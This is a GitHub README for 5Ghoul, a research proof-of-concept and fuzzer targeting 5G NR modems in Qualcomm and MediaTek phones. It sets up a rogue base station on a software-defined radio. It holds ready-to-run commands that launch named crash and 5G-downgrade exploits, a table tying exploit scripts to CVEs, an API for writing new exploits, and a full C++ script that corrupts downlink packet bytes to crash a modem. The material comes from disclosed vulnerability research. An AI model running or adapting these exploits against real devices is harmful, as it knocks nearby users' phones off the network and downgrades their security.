asset-group / 5ghoul-5g-nr-attacks

5G NR Attacks against Qualcomm and Mediatek smartphones. Fuzzer included⚡
https://5ghoul.com
GNU General Public License v2.0
513 stars 85 forks source link

README

5Ghoul - 5G NR Attacks & 5G OTA Fuzzing⚡

Proof of Concept (PoC) of 5G NR Attacks against commercial smartphones, CPE routers, USB Modems, etc. Fuzzer included⚡. 5Ghoul is family of implementation-level 5G DoS vulnerabilities affecting Qualcomm and MediaTek mobile platforms. For more details, see https://asset-group.github.io/disclosures/5ghoul/

attack\_overview\_with\_output


Table of Contents


📰 Talks & Updates

1. 📋 Requirements

ETTUS USRP B210 Software Defined Radio (SDR)

SysmoISIM-SJA2 programmable SIM/USIM/ISIM cards

2. ⏩ Quick Start (Docker Container)

To get started with 5Ghoul PoC, we recomend usage of 5Ghoul Container, available in our docker hub. To simplify its usage, we created a wrapper script to run the container with all the required docker arguments:

mkdir 5ghoul # Create 5ghoul folder
curl -LJO https://github.com/asset-group/5ghoul-5g-nr-attacks/raw/master/container.sh
chmod +x container.sh # Give exec. permission to the 5Ghoul container script
./container.sh run release-5g # This will pull and start the terminal of the 5Ghoul container
sudo bin/5g_fuzzer --MCC=001 --MNC=01 --GlobalTimeout=false --EnableMutation=false # Start the base station inside the container

The final command above (sudo bin/5g_fuzzer ...) will start the rogue base station without any attack. Therefore, you can use this to verify if the connection between the rogue base station and the smartphone works in first place. Once the smartphone attempts to connect to the rogue base station, the 5Ghoul PoC will indicate such connection by printing the message "[!] 1/2 UE connected to eNB/gNB". This message indicates that your setup is working and ready to launch attacks.

normal-connection

2.1. Simulation (Testing 5Ghoul without SDR)

If you do not have an SDR, but would like to test 5Ghoul for 5G experimentation or to launch sample attacks, there is an experimental simulation support provided by OpenAirInterface. You can use such simulation mode by running 5Ghoul PoC with the additional argument --EnableSimulator=true as shown in the Figure below. Note that you will receive an error message UE MAC Authentication Failure. This is because OpenAirInterface stack does not implement all the functionalities to connect the UE to the gNB during simulation. You can however use this simulation mode to check 5G captures and test custom exploit scripts:

sudo bin/5g_fuzzer --EnableSimulator=true --EnableMutation=false --GlobalTimeout=false

simulator-output

2.2 Over-the-air packet traces (Wireshark Capture)

The communication trace (.pcapng capture file) of the over-the-air communication between gNB and UE are automatically saved to folder logs after running the 5Ghoul PoC. You can immediately view the 5G capture in Wireshark by running the following command:

./bin/wireshark logs/5gnr_gnb/capture_nr5g_gnb.pcapng
5g-pcapng-capture

3. ☢️ Launching a 5Ghoul attack

To put it simply, you can just run the following command after connecting USRP B210 to your PC/Laptop:

sudo ./bin/5g_fuzzer --exploit=mac_sch_rrc_setup_crash_var --MCC=001 --MNC=01

Once the 5Ghoul PoC runs, it will start a rogue base station (gNB) using the provided MCC and MNC by the command line. You can attempt to connect to this rogue base station by inserting a compatible testing SIM card and scanning for operator networks in Android mobile connectivity settings. More details on this is provided in Section Phone Configuration.

When the smartphone connects to the rogue base station and an attack is launched, the terminal will print messages such as "Malformed rrc setup sent!". These messages depend on the chosen exploit script. The Figure below exemplifies the expected output for the 5Ghoul vulnerability V7, which disables the 5G connection of the smartphone. In this context, the smartphone won't be able to reconnect to the rogue base station and message "Target is not responding" is printed if no communication with the smartphone is possible after 45 seconds.

poc-attack-v7

3.1 Tutorial Video

User Cemaexecuter prepared a video to show how to configure 5Ghoul to launch attacks against a Qualcomm-based 5G modem from Quectel.

Alt text

3.2 Summary of Available Attacks

Currently, 5Ghoul PoC has 12 exploits available. The correspondence between the exploit name and 5Ghoul vulnerability is shown in the Table below.

5Ghoul Vulnerability Name Exploit Script Name CVE
V1 - Invalid PUSCH Resource Allocation TBA Pending
V2 - Empty RRC dedicatedNAS-Message TBA Pending
V3 - Invalid RRC Setup mac_sch_rrc_setup_crash N.A (Patched)*
V4 - Invalid RRC Reconfiguration mac_sch_rrc_reconfiguration_crash N.A (Patched)*
V5 - Invalid MAC/RLC PDU mac_sch_mac_rlc_crash CVE-2023-33043
V6 - NAS Unknown PDU mac_sch_nas_unknown_pdu_crash CVE-2023-33044
V7 - Disabling 5G / Downgrade via RRC mac_sch_rrc_setup_crash_var CVE-2023-33042
V8 - Invalid RRC Setup spCellConfig mac_sch_mtk_rrc_setup_crash_4 CVE-2023-32842
V9 - Invalid RRC pucch CSIReportConfig mac_sch_mtk_rrc_setup_crash_2 CVE-2023-32844
V10 - Invalid RLC Data Sequence mac_sch_mtk_rlc_crash CVE-2023-20702
V11 - Truncated RRC physicalCellGroupConfig mac_sch_mtk_rrc_setup_crash_6 CVE-2023-32846
V12 - Invalid RRC searchSpacesToAddModList mac_sch_mtk_rrc_setup_crash_1 CVE-2023-32841
V13 - Invalid RRC Uplink Config Element mac_sch_mtk_rrc_setup_crash_3 CVE-2023-32843
V14 - Null RRC Uplink Config Element mac_sch_mtk_rrc_setup_crash_7 CVE-2023-32845
V15 - Invalid RRC CellGroup ID mac_sch_mtk_rrc_setup_crash_8 CVE-2024-20003
V16 - Invalid RRC CellGroupConfig mac_sch_mtk_rrc_setup_crash_9 CVE-2024-20004
DA1 - NAS Flooding Downgrade TBA N.A

You can list the name of all existing 5Ghoul exploits by passing the argument --list-exploits as shown below:

sudo bin/5g_fuzzer --list-exploits
...
Available Exploits:
--> mac_sch_mtk_rrc_setup_crash_3 Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_mtk_rrc_setup_crash_7 Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_rrc_setup_crash Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_mtk_rrc_setup_crash_4 Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_rrc_setup_crash_var Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_mtk_rrc_setup_crash_2 Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_mac_rlc_crash Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_mtk_rlc_crash Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_nas_unknown_pdu_crash Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_mtk_rrc_setup_crash_6 Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_mtk_rrc_setup_crash_1 Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 
--> mac_sch_rrc_reconfiguration_crash Groups: [mac_sch_:203] [mac_sch_:204] [mac_sch_:205] 

4. 📜 Create your own 5G exploits (test cases)

5Ghoul supports launching customized test cases in which the user can freely modify the flow of communication between base station (gNB) and user equipment (UE). This is notably used to launch the listed exploits of the previous section, however the user can add new test cases for a plethora of applications other than launching attack packets towards the UE. The data flow diagram on how 5Ghoul handles custom exploit scripts is illustrated in the Figure below.

interception-diagram-uplink
interception-diagram-downlink

When saving a new exploit script to folder modules/exploits/5gnr_gnb, the 5Ghoul PoC binary will compile and load the new script during startup. You can check if your script has compiled and loaded correctly, by listing it in the exploits list: sudo bin/5g_fuzzer --list-exploits. It is possible for the script compilation to randomly fail, but you can try recompiling by running the 5Ghoul PoC binary again.

4.1. Exploits Script API Usage

5Ghoul PoC loads a script at startup from modules/exploits/5gnr_gnb and calls int setup(wd_modules_ctx_t *ctx) and const char *module_name(). Additionally, other functions are called for every received 5G packet to and from the UE (via Base Station). In this context, received uplink packets are firstly forwarded to rx_pre_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx), decoded and finally passed to rx_post_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx) via arguments containing the raw packet buffer (pkt_buf, pkt_length) and the decoding context variable ctx. These callback functions need to be defined inside the exploit script created by the user. Otherwise, 5Ghoul will simply ignore calls for these functions and essentially not do anything after receiving a 5G packet. In summary, the intention of using _pre_ and _post_ callbacks is to allow the user to filter 5G packets before and after decoding. In the case of Downlink packets, it is possible to alter packets destined to the target UE or inject new packets. Firstly, a simple example of capturing Uplink (analysis only) is illustrated in the Figure below.

interception-script-uplink

Initialization

Detailed information on callbacks that are invoked during initialization of 5Ghoul PoC is discussed below.

Uplink Interception (Packet Analysis Only)

Detailed information on callbacks that are invoked when receiving Uplink frames from the UE is discussed below.

Downlink Interception (Packet Analysis and Mutation)

Downlink Interception is arguably a bit more complicated than uplink interception. This is because downlink interception offers slightly more features to the user in terms of test case creation. Whenever the Base Station wants to reply to the UE, it will generate a raw 5G MAC buffer. This buffer can be modified by the user C++ exploit script, before such buffer is ultimately transmitted over-the-air to the UE. To this end, 5Ghoul Interception API connects the _pre_ and _post_ callbacks in a similar fashion as Uplink, but the main difference is that transmission of a downlink packet is delayed to the UE until the tx_post_dissection callback finishes its execution. Since tx_post_dissection passes as argument the raw buffer pkt_buf to the function, any change in this packet buffer will be forwarded to the Base Station software stack, which will then transmit the mutated payload over-the-air. For this reason, it is important to remember that the user should not insert delays (e.g., usleep) inside both tx_pre_dissection and tx_post_dissection. Doing such would make the Base Station delay its communication downlink transmission and ultimately terminate its 5G communication with the UE. An example of the execution flow of a downlink packet through tx_pre_dissection and tx_post_dissection callbacks is illustrated in the Figure below.

interception-script-downlink

Detailed information on callbacks that are invoked when receiving Downlink frames to the UE is discussed in the following sections.

4.2. Example (MAC/RLC Crash C++ Script)

A full 5Ghoul Exploit script example is provided below. The sample script below (mac_sch_mac_rlc_crash.cpp) only defines callback functions to analyze downlink ( tx_pre_dissection, tx_post_dissection) since we curently focus on changing bytes of the downlink packets to launch an attack. However, if you want to create a script that analyses the response of the UE, using the uplink callbacks (rx_pre_dissectoin and rx_post_dissection) is greatly helpful.

#include <ModulesInclude.hpp>

// Filters
wd_filter_t f1;

const char *module_name()
{
    return "ANY NAME";
}

// Setup
int setup(wd_modules_ctx_t *ctx)
{
    // Change required configuration for exploit
    ctx->config->fuzzing.global_timeout = false;
    ctx->config->fuzzing.enable_mutation = false;
    // Declare filters
    f1 = wd_filter("rlc-nr.am.dc == 0"); // Filter to find RLC Status PDU
    return 0;
}

// ---------------- Packet Handler for Downlink (TX) from gNB to UE ----------------
// Handler is called before packet decoding. You can register decoding filters here
int tx_pre_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx)
{
    // Register filters. This needs to always be done before packet decoding
    wd_register_filter(ctx->wd, f1);
    return 0;
}

int tx_post_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx)
{
    if (wd_read_filter(ctx->wd, f1)) {
        wd_log_y("Malformed MAC data sent!");
        pkt_buf[60 - 48] = 0xB5; // Modify raw packet at offset 12
        pkt_buf[61 - 48] = 0x02; // Modify raw packet at offset 13
        return 1; // Indicate that the packet payload has been mutated (i.e., changed from the original)
    }
    return 0; // Indicate that no change to the packet payload
}

5. 🔀 Running the 5G NR Fuzzer

The 5Ghoul fuzzer supports running in CLI mode or graphical interface. To run in graphical interface, simply add the --gui argument when calling the 5g_sa binary. You can start the fuzzer as follows:

sudo bin/5g_fuzzer --MCC=001 --MNC=01 --EnableMutation=true # Run fuzzer in command line interface mode (CLI)

Upon successful connectivity with the smartphone or modem, the 5G fuzzer highlights mutated (fuzzed) downlink PDUs in purple. Concurrently, a live capture of the over-the-air communication between the smartphone (UE) and the rogue base station (gNB performing the fuzzing) is shown to the user. Furthermore, the communication trace and logs are saved to logs/5gnr_gnb .

The tool also has a graphical interface that is mostly used for development and troubleshooting the 5G connection or showcasing attack or fuzzing demos ✌. An example of the 5Ghoul GUI is shown below.

sudo bin/5g_fuzzer --MCC=001 --MNC=01 --EnableMutation=true --gui # Run with graphical user interface (GUI)

fuzzer-gui

6. 🛠️ (Optional) Build 5Ghoul software from source

Several requirements need to be installed before compiling the project. An automated script for Ubuntu 18.04 is provided on requirements.sh. To compile from source, simply run the following commands:

git clone https://github.com/asset-group/5ghoul-5g-nr-attacks
cd 5ghoul-5g-nr-attacks
./requirements.sh dev # Install all system requirements to compile 5ghoul fuzzer (Important)
./requirements.sh 5g # Install all system requirements to compile OpenAirInterface and Open5GS
./build.sh all # Compile all binaries WITH Wireshark. It may take around 20min. Go get a coffe!
./build.sh dev # (OPTIONAL) Compile all binaries WITHOUT Wireshark.
./build.sh # Run without arguments to quickly build the 5g_fuzzer after modifying any file inside ./src folder.

The expected output during the build process is shown below:

5ghoul-build-output

7. ⚙️ Advanced Options

You can list all options of 5Ghoul PoC by running it with --help argument as shown below:

sudo bin/5g_fuzzer --help
Fuzzer for 5G NR User Equipment (UE) - MAC-NR, PDCP-NR, RLC-NR, NAS-5GS
Usage:
  5g_fuzzer [OPTION...]

  -h, --help            Print help
      --default-config  Start with default config
  -g, --gui             Open Graphical User Interface (GUI)

 Fuzzing:
      --EnableDuplication       
      --EnableMutation           (default: true)
      --EnableOptimization       (default: true)
      --DefaultDuplicationProbability arg
                                 (default: 0.200000)
      --DefaultMutationProbability arg
                                 (default: 0.200000)
      --DefaultMutationFieldProbability arg
                                 (default: 0.100000)
      --FieldMutationBackoffMultipler arg
                                 (default: 0.500000)
      --MaxFieldsMutation arg    (default: 2)
      --NormalizeProtocolLayersMutation

      --MaxDuplicationTimeMS arg
                                 (default: 6000)
      --PacketRetry             
      --PacketRetryTimeoutMS arg
                                 (default: 2500)
      --GlobalTimeout            (default: true)
      --GlobalTimeoutSeconds arg
                                 (default: 45)
      --StateLoopDetection      
      --StateLoopDetectionThreshold arg
                                 (default: 5)
      --RandomSeed arg           (default: 123456789)
      --SeedIncrementEveryIteration
                                 (default: true)
      --RestoreSessionOnStartup

      --SaveSessionOnExit       
      --Selector arg             (default: 0)
      --Mutator arg              (default: 1)

 Modules:
      --exploit arg             Launch Exploit
      --list-exploits           List Available Exploits
      --list-exploits-groups    List Exploit Groups (Debug)
      --list-exploits-prefixes  List Exploit Prefixes (Debug)

 NR5G:
      --MCC arg                  (default: 001)
      --MNC arg                  (default: 01)
      --AutoStartBaseStation     (default: true)
      --AutoStartCoreNetwork     (default: true)
      --BaseStationConfigFile arg
                                 (default: n78.106.conf)
      --BaseStationArguments arg
                                 (default: --sa --continuous-tx -E)
      --CoreNetworkConfigFile arg
                                 (default: open5gs.yaml)
      --EnableSimulator         
      --SimulatorDelayUS arg     (default: 2000)
      --SimulationConnectionTimeoutMS arg
                                 (default: 1000)
      --SimulatorUEArguments arg
                                 (default: -r 106 --numerology 1 --band 78 
                                -E -C 3619200000 --rfsim --sa --ssb 516)

 Options:
      --DefaultProtocolName arg
                                 (default: proto:mac-nr-framed)
      --DefaultProtocolEncapName arg
                                 (default: encap:1)
      --SaveProtocolCapture      (default: true)
      --LiveProtocolCapture     
      --SaveLogsToFile           (default: true)
      --SaveLatencyMetrics      
      --SkipPacketProcessing    
      --Program arg              (default: 1)
      --AutoStartProgram         (default: true)
      --AutoRestartProgram      
      --LaunchProgramWithGDB    
      --MainThreadCore arg       (default: -1)
      --SaveCoreDump            

 UEModemManager:
      --APN arg                  (default: internet)
      --AllowedModes arg         (default: 4g|5g)
      --PreferredMode arg        (default: 5g)
      --Bands arg                (default: ngran-78)
      --DisableFuzzingOnFirstConnection
                                 (default: true)
      --AutoConnectModem         (default: true)
      --ConnectionTimeoutMS arg
                                 (default: 4000)
      --UseOnlyATConnections    
      --AutoConnectToAPN         (default: true)
      --ManualAPNConnection     
      --ManualAPNConnectionDelayMS arg
                                 (default: 0)
      --AutoReconnectModem       (default: true)
      --ResetModemOnGlobalTimeout
                                 (default: true)
      --GlobalTimeoutsCount arg
                                 (default: 3)
      --DefaultModemInterfacePath arg
                                 (default: /dev/cdc-wdm1)
      --AutoSearchModemInterfacePath
                                 (default: true)
      --UseInUSBIPHostSSH       
      --EnableADB                (default: true)
      --ADBDevice arg            (default: R5CT720QT7H)
      --ADBPIN arg               (default: 123123)

8. ✉️ Supported 5G Protocols (Stacks)

5Ghoul PoC & Fuzzer is built upon well known protocols stack implementation. These are used to generate messages and to guide the target device towards a set of protocol procedures which are expected to be tested again unknown or insecure behaviour.

protocol-stack-5g

🙏 Third-Party Libraries & Acknowledgements

🌟 Star History

Star History Chart